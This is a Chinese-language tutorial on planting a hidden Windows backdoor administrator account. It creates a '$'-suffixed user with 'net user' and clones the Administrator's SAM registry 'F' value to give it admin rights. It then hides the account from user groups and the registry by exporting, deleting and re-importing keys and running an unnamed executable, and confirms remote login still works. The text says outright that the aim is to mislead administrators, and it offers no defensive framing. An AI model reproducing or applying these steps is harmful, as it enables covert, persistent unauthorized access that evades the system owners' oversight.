1.先通过命令创建隐藏账户
net user test$ 123.com /add
在net user
发现看不到用户 但是 在用户组是可以看到的
先把加入管理员组在禁用
我们可以把用户命名成上面一样的用户名 都是禁用状态 可以迷惑管理员
2.复制admin权限
打开注册表
打开注册表编辑器,点击:HKEY_LOCAL_MACHINE → SAM→SAM→Domains→Account→Users→Names→test$。看这个 :test$就是我们刚刚创建的隐藏账户,如果sam 不能打开 说明没加权限
把完全控制勾上
在
就有了
Administrator 的key 是 1f4
找到:000001F4,点击进去,在右上角,找到 F 这个文件,点击打开,复制里面的数据。
复制到 000003F5 的F文件
这个时候我们再看用户组
用户已禁用已经没了 并且test$ 用户就是admin 用户了 头像也还是禁用状态 可以远程登录
这是admin 下创建的文件夹
远程连接
权限复制成功
3.用户组隐藏
要在用户组里也看不到隐藏账户 修改注册表
将000003F5,点击右键,将数据导出到桌面,命名为1。将TEST$,点击右键,将数据导出到桌面,命名为2。
命令把test$ 删除
net user test$ /del
在运行 1.reg 2.reg
只有在注册表能看见 用户组隐藏了
还是可以远程登录
4.注册表隐藏
把这个两个文件复制在主机上
把用户名和注册表键值填上
运行exe 自动隐藏
注册表也没了
试试还能不能登录
登录成功